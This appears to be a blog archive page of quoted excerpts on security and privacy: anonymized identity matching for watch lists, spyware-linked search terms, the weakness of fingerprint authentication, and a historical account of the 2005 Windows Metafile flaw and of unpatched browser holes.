Here’s the scenario: The government has a list of people we should never let into the country. It’s a secret. They don’t want people in other countries to know. And the government tends to not share this list with corporate America. Now, if you have a cruise line, you want to make sure you don’t have people getting on your boat who shouldn’t even be in the United States in the first place. Prior to the U.S. Patriot Act, the government couldn’t go and subpoena 100,000 records every day from every company. Usually, the government would have to go to a cruise line and have a subpoena for a record. Section 215 [of the Patriot Act] allows the government to go to a business entity and say, “We want all your records.” Now, the Fourth Amendment, which is “search and seizure,” has a legal test called “reasonable and particular.” Some might argue that if a government goes to a cruise line and says, “Give us all your data,” it is hard to envision that this would be reasonable and particular.

But what other solution do they have? There was no other solution. Our Anonymous Resolution technology would allow a government to take its secret list and anonymize it, allow a cruise line to anonymize their passenger list, and then when there’s a match it would tell the government: “record 123.” So they’d look it up and say, “My goodness, it’s Majed Moqed.” And it would tell them which record to subpoena from which organization. Now it’s back to reasonable and particular. ….

TR: How is this is based on earlier work you did for Las Vegas casinos?

JJ: The ability to figure out if two people are the same despite all the natural variability of how people express their identity is something we really got a good understanding of assisting the gaming industry. We also learned how people try to fabricate fake identities and how they try to evade systems. It was learning how to do that at high speed that opened the door to make this next thing possible. Had we not solved that in the 1990s, we would not have been able to conjure up a method to do anonymous resolution.

Matching identities across databases, anonymously Read More »

Killer search terms

From The Inquirer‘s “Killer phrase will fill your PC with spam”:

THERE IS ONE phrase which, if you type into any search engine will expose your PC to shed-loads of spam, according to a new report.

Researchers Ben Edelman and Hannah Rosenbaum reckon that typing the phrase “Free Screensavers” into any search engine is the equivalent of lighting a blue touch paper and standing well back. …

More than 64 per cent of sites that are linked to this phrase will cause you some trouble, either with spyware or adware. The report found 1,394 popular keywords searches found via Google, Yahoo, MSN, AOL and Ask that were linked to spyware or adware and the list is quite amusing. Do not type in the following words into any search engine:

Bearshare
Screensavers
Winmx
Limewire
Download Yahoo messenger
Lime wire
Free ringtones

Killer search terms Read More »

Problems with fingerprints for authentication

From lokedhs’ “There is much truth in what you say”:

The problem with fingerprints is that it’s inherently a very insecure way of authentication for two reasons:

Firstly, you can’t change it if it leaks out. A password or a credit card number can be easily changed and the damage minimised in case of an information leak. Doing this with a fingerprint is much harder.

Secondly, the fingerprint is very hard to keep secret. Your body has this annoying ability to leave copies of your identification token all over the place, very easy for anyone to pick up.

Problems with fingerprints for authentication Read More »

Why infosec is so hard

From Noam Eppel’s “Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security“:

A cyber-criminal only needs to identify a single vulnerability in a system’s defenses in order to breach its security. However, information security professionals need to identify every single vulnerability and potential risk and come up with suitable and practical fix or mitigation strategy.

Why infosec is so hard Read More »

Windows Metafile vulnerability

From Noam Eppel’s “Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security“:

On Dec. 27, 2005 a Windows Metafile (.WMF) flaw was discovered affecting fully patched versions of XP and Windows 2003 Web Server. Simply by viewing an image on a web site or in an email or sent via instant messenger, code can be injected and run on the target computer. The vulnerability was in the Windows Graphics Rendering Engine which handles WMF files, so all programs such as Internet Explorer, Outlook and Windows Picture and Fax viewer which process this type of file were affected.

Within hours, hundred of sites start to take advantage of the vulnerability to distribute malware. Four days later, the first Internet messenger worm exploiting the .wmf vulnerability was found. Six days later, Panda Software discovers WMFMaker, an easy-to-use tool which allows anyone to easily create a malicious WMF file which exploits the vulnerability.

While it took mere hours for cybercriminals to take advantage of the vulnerability, it took Microsoft nine days to release an out-of-cycle patch to fix the vulnerability. For nine entire days the general public was left with no valid defenses.

The WMF Flaw was a security nightmare and a cybercriminal dream.It was a vulnerability which (a) affected the large majority of Windows computers (b) was easy to exploit as the victim simply had to view an image contained on a web site or in an email, and (c) was a true zero-day with no patch available for nine days. During those nine days, the majority of the general population had no idea how vulnerable they were.

Windows Metafile vulnerability Read More »

IE unsafe 98% of the time

From Noam Eppel’s “Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security“:

The security company Scanit recently conducted a survey which tracked three web browsers (MSIE, Firefox, Opera) in 2004 and counted which days they were “known unsafe.” Their definition of “known unsafe”: a remotely exploitable security vulnerability had been publicly announced and no patch was yet available. Microsoft Internet Explorer, which is the most popular browser in use today and installed by default on most Windows-based computers, was 98% unsafe. Astonishingly, there were only 7 days in 2004 without an unpatched publicly disclosed security hole. Read that last sentence again if you have to.

IE unsafe 98% of the time Read More »